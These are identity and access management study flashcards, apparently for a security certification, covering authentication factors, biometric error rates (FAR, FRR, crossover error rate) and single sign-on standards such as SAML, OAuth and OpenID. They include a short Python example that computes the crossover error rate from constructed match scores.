After authentication, systems authorize a subject's access to objects based on its proven identity

After authentication

98
Q

AuthZ vs Accountability
Accountability

A

Auditing logs and audit trails record events including the ID of the subject that performed the action

Provides proof
Identification + authentication + auditing = Accountability

99
Q

Primary Authentication Factors
Passwords

A

weakest form of authentication

  • Password policies help increase security by enforcing complexity and history requirements
100
Q

Primary Authentication Factors
Smartcards

A

Include microprocessors and cryptographic certificates

101
Q

Primary Authentication Factors
Tokens

A

create onetime passwords

102
Q

Primary Authentication Factors
Biometric

A

ID users based on characteristics like finger prints

Know the crossover error rate

103
Q

Biometrics
Gait Analysis

A

Identifies a person by the way they walk; can work with low-quality cameras

104
Q

Biometrics
False acceptance

A

When an invalid subject is authenticated.

  • Type 2 error
  • false positive
  • FAR = False Acceptance Rate

False acceptance is generally worse than false rejection

105
Q

Biometrics
False rejection

A

When a valid subject is rejected

  • Type 1 error
  • false negative
  • FRR = False Rejection Rate
106
Q

Biometrics
Crossover Error Rate

A

Identifies the accuracy of a biometric method

  • It is the point where the false rejection rate equals the false acceptance rate; a lower CER means a more accurate system
  • Increasing / decreasing the device's sensitivity (its match threshold) trades FRR against FAR; this moves the operating point along the curve, not the system's CER
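As an added example (not part of the flashcards), the following code computes FAR and FRR from match scores at every threshold and locates the crossover, tying together the three biometric cards above. The genuine and impostor score lists are constructed; a real system would produce them by comparing captured samples against enrolled templates.

```python
# Added example (not from the flashcards): compute FAR and FRR from match
# scores at every threshold and locate the crossover error rate. Scores are
# constructed (a real system produces them from template comparisons).
GENUINE  = [62, 70, 75, 78, 80, 83, 85, 88, 90, 95]   # legitimate users' match scores
IMPOSTOR = [20, 30, 35, 40, 45, 50, 55, 60, 65, 72]   # impostors' match scores


def far_frr(genuine, impostor, threshold):
    """A sample is accepted when its score >= threshold. Returns (FAR, FRR)."""
    far = sum(s >= threshold for s in impostor) / len(impostor)   # Type II: impostor accepted
    frr = sum(s < threshold for s in genuine) / len(genuine)      # Type I: legitimate user rejected
    return far, frr


def crossover(genuine, impostor, thresholds=range(0, 101)):
    """Sweep the threshold and return (threshold, CER) where FAR and FRR are closest."""
    best = None
    for t in thresholds:
        far, frr = far_frr(genuine, impostor, t)
        gap = abs(far - frr)
        if best is None or gap < best[0]:
            best = (gap, t, (far + frr) / 2)
    return best[1], best[2]


if __name__ == "__main__":
    t, cer = crossover(GENUINE, IMPOSTOR)
    print(f"CER {cer:.2f} at threshold {t}")
    for t in (50, 66, 80):          # loose, crossover, strict
        far, frr = far_frr(GENUINE, IMPOSTOR, t)
        print(f"threshold {t}: FAR={far:.1f} FRR={frr:.1f}")
```

Running the sweep shows the trade-off the CER card describes: a loose threshold (50) admits half the impostors with no false rejections, a strict one (80) rejects 40% of genuine users while admitting nobody, and the crossover sits between them. Changing the threshold moves you along this curve; only a better sensor or matching algorithm lowers the CER itself.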
107
Q

Single Sign-On

A

Allows subjects to authenticate once and access multiple objects without authenticating again.

Common SSO standards:
- SAML
- SESAME
- KryptoKnight
- OAuth
- OpenID

108
Q

SSO - SAML, OAuth, OpenID
Security Assertion Markup Language (SAML)

A

XML-based open standard data format for AuthN. and AuthZ data between parties
- Between ID provider and a service provider

  • common in federation scenarios
109
Q

SSO - SAML, OAuth, OpenID
OAuth 2.0

A

Open standard for AuthZ, commonly used as a way for internet users to grant 3rd-party websites access to their Google (etc.) accounts without exposing their password.

  • Developed by the IETF, updated through RFCs
  • OAuth is an authorization framework; authentication on top of it is provided by OpenID Connect (OIDC)
110
Q

SSO - SAML, OAuth, OpenID
OpenID

A

Open standard that provides decentralized AuthN, allowing users to log into multiple unrelated websites with one set of credentials maintained by a 3rd-party service referred to as the OpenID provider
